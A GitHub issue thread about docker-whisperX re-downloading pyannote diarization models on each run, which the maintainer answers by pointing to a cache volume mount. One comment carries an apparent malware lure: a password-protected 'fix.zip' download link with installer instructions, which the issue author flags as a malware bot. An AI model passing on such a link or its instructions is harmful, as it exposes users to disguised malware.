### ISSUE TITLE
Diarization doesnt cache the files for reuse.

### ISSUE THREAD

**Issue by dinopio** [jim60105/docker-whisperX#43] opened 2024-08-28 10:23 UTC
Diarization doesnt cache the files for reuse.

>>Performing transcription...
Detected language: en (0.97) in first 30s of audio...
>>Performing alignment...
>>Performing diarization...
config.yaml: 100%|█████████████████████████████████████████████████████████████████████| 469/469 [00:00<00:00, 2.64MB/s]pytorch_model.bin: 100%|███████████████████████████████████████████████████████████| 5.91M/5.91M [00:00<00:00, 6.24MB/s]config.yaml: 100%|█████████████████████████████████████████████████████████████████████| 399/399 [00:00<00:00, 4.34MB/s]pytorch_model.bin: 100%|███████████████████████████████████████████████████████████| 26.6M/26.6M [00:02<00:00, 12.1MB/s]config.yaml: 100%|█████████████████████████████████████████████████████████████████████| 221/221 [00:00<00:00, 2.52MB/s]

Each run downloads the same files

**Comment by LC-JiaZhaorong** [comment] 2024-08-28 10:28
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dinopio** [comment] 2024-08-28 11:09
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

malware bot

**Comment by jim60105** [comment] 2024-08-28 17:04
Since downloading `pyannote/speaker-diarization-3.1` model [requires signing the user agreement](https://github.com/m-bain/whisperX?tab=readme-ov-file#speaker-diarization), I cannot pre-load them in the docker image.

To retain the downloaded models between execution, [follow this instruction](https://github.com/jim60105/docker-whisperX?tab=readme-ov-file#%EF%B8%8F-preserve-the-download-cache-for-the-align-models-when-working-with-various-languages) to mount `/.cache` to a volume.

Close this as "by design".

**Closed** 2024-08-28 17:04 UTC
